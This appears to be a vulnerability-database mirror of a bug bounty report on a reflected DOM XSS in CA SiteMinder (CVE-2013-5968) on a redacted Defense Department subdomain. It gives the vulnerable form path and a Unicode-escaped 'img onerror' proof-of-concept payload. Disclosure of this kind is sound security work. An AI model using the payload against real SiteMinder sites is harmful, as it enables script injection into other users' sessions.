Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneMedokll0011H1:1982099
HistoryMay 10, 2023 - 7:06 p.m.

U.S. Dept Of Defense: DOM-XSS

2023-05-1019:06:02
medokll0011
hackerone.com
102

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

62.7%

JSON

hello defense team :
I found DOM-XSS-SiteMinder on this subdomain : https://████/

Impact

An attacker with access to the Siteminder CA could perform a cross-site scripting attack, which it would use to cause information leaks, privilege escalation, and/or denial of service.

System Host(s)

██████████

Affected Product(s) and Version(s)

CVE Numbers

CVE-2013-5968

Steps to Reproduce

Steps :
1 go to https://███/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=7&USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

XSS will be triggered

this is payload :
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Suggested Mitigation/Remediation Actions

Related

cve 1
securityvulns 2
prion 1
cve
cve
CVE-2013-5968
2013-10-29 03:42:00
securityvulns
securityvulns
CA SiteMinder crossite scripting
2013-10-28 00:00:00
CA20131024-01: Security Notice for CA SiteMinder
2013-10-28 00:00:00
prion
prion
Cross site scripting
2013-10-29 03:42:00

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.003 Low

EPSS

Percentile

62.7%

JSON
Related for H1:1982099
cve1securityvulns2prion1